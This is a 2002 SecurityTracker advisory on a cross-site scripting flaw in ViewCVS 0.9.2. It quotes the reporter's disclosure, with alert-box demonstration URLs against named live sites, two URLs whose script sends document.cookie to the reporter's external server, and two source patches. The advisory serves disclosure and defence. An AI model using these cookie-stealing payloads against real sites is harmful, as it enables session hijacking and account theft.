SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   ViewCVS Vendors:   Viewcvs.sourceforge.net
ViewCVS Web-based CVS Interface Allows Cross-Site Scripting Attacks Against ViewCVS Users
SecurityTracker Alert ID:  1004328
SecurityTracker URL:  http://securitytracker.com/id/1004328
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 20 2002
Impact:   Disclosure of authentication information, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 0.9.2 and prior versions
Description:   A vulnerability was reported in the ViewCVS web-based CVS interface software. A remote user can conduct cross-site scripting attacks against ViewCVS users to steal their authentication cookies.

The software will display user-supplied HTML without filtering script tags. A remote user can create an HTML link that, when loaded by the target (victim) user, will cause arbitrary scripting code to be executed on the target user's browser. The code will appear to originate from the site running ViewCVS and will run in the security context of that site. As a result, the code will be able to steal the target user's authentication cookies associated with the site running ViewCVS. The code may be able to take actions on the ViewCVS site acting as the target user.

Some demonstration exploit URLs are provided:

http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("hello")</script>
http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>

The vendor has reportedly been notified.

Impact:   A remote user can create HTML links that, when loaded, will cause arbitrary scripting code to be executed on the target user's browser. The code can steal the target user's authentication cookies associated with the ViewCVS site.
Solution:   No solution was available at the time of this entry.
Vendor URL:  viewcvs.sourceforge.net (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  cross-site scripting bug of ViewCVS


ViewCVS: cross-site scripting bug

I found the following cross-site scripting vulnerability in ViewCVS:


Details
------------
Product: ViewCVS
Affected Version: 0.9.2 and under it
Vendor's URL: http://viewcvs.sourceforge.net/
Vendor Status: Informed. And they already fixed it only in their team.
               But nothing has been published.


Introduction
------------
ViewCVS is a WWW interface for CVS Repositories. It is widely used in 
freesoft community and open source community. Unfortunately, it has 
the vulnerability of cross-site scripting.


Proof
-----------------
If you access to the URL like;

http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("hello")</script>
http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>

The former URL is valid for Internet Explorer 6.0, Opera 6.01, but not 
valid for Netscape 4.78, Netscape 6.2.2, mozilla 0.9.9 on windows XP.
And these URL can do is only showing a popup window appearing.


Example
-----------------
For example, you can see the vulnerability at the SourceForge.net
 (Vendor's site is on SourceForge.net).

If you access to the sample URL following, your cookie (including 
your login information and session information about SourceForge.net) 
is stolen by my site (http://www.office.ac)

The stolen cookie's information of Internet Explorer 6.0 includes your 
login information and session information about SourceForge.net.
But the stolen cookie's information of Opera 6.01 and mozilla 0.9.9 
includes only user name, and the cookie information of Netscape 4.78 
and 6.2.2 is nothing. (I don't know why.)

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</
script>

The ViewCVS at SourceForge.net is not newest version.
And you can see the vulnerability of newest version of ViewCVS at GNU.

http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=<script>alert("hello")</script>
http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev"><script>alert("hello")</script>


Vendor status
--------------
Vendors are noticed at 13 Mar 2002, and 26 Mar 2002.

And I heard following:
Some Japanese hackers (contributors belong to SourceForge.jp and 
Hyper NIKKI System Project) proposed a patch program to ViewCVS team 
in April. But ViewCVS team rejected it. ViewCVS team said they 
fixed it at April 1st.
But nothing has been published by ViewCVS team after it.


Patch
--------------
Two patches are here. I got these patches with the non-safe method,
so I am not sure that their code are completely same to original.
And I cannot understand about code nor programming at all.
So I don't have any accountability about these patch.

One was made by Kenji Suzuki <kenji@po.ganseki.ne.jp> / Hyper 
NIKKI System Project (http://www.h14m.org/).
I heard it has been applied to the web page of Hyper 
NIKKI System Project, and Sourceforge.jp.

--- viewcvs.py.orig	Fri Dec 14 23:14:39 2001
+++ viewcvs.py	Sun Mar 31 15:24:34 2002
@@ -172,7 +172,7 @@
     # parse the query params into a dictionary (and use defaults)
     query_dict = default_settings.copy()
     for name, values in cgi.parse().items():
-      query_dict[name] = values[0]
+      query_dict[name] = cgi.escape(values[0])
 
     # set up query strings, prefixed by question marks and ampersands
     query = sticky_query(query_dict)



I heart another patch is made by ViewCVS team.  I got this code
from Taku YASUI <tach@sourceforge.jp> / Sourceforge.jp 
(http://sourceforge.jp/) who had been proposed former patch to 
ViewCVS team.


===================================================================
RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v
retrieving revision 1.107
retrieving revision 1.108
diff -u -r1.107 -r1.108
--- viewcvs/viewcvs/lib/viewcvs.py	2002/02/22 09:20:46	1.107
+++ viewcvs/viewcvs/lib/viewcvs.py	2002/04/01 01:32:16	1.108
@@ -180,8 +180,14 @@
 
     # parse the query params into a dictionary (and use defaults)
     query_dict = default_settings.copy()
+
+    # RE that ViewCVS doesn't use in any URL, but a CSS attack might
+    re_url_validate = re.compile('\'|"|<|>')
     for name, values in cgi.parse().items():
-      query_dict[name] = values[0]
+      # do not accept values that contain non-ViewCVS characters
+      # except for search
+      if not re.search(re_url_validate, values[0]) or name == 'search':
+        query_dict[name] = values[0]
 
     # set up query strings, prefixed by question marks and ampersands
     query = sticky_query(query_dict)


--
office
office@ukky.net
office@office.ac
http://www.office.ac/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC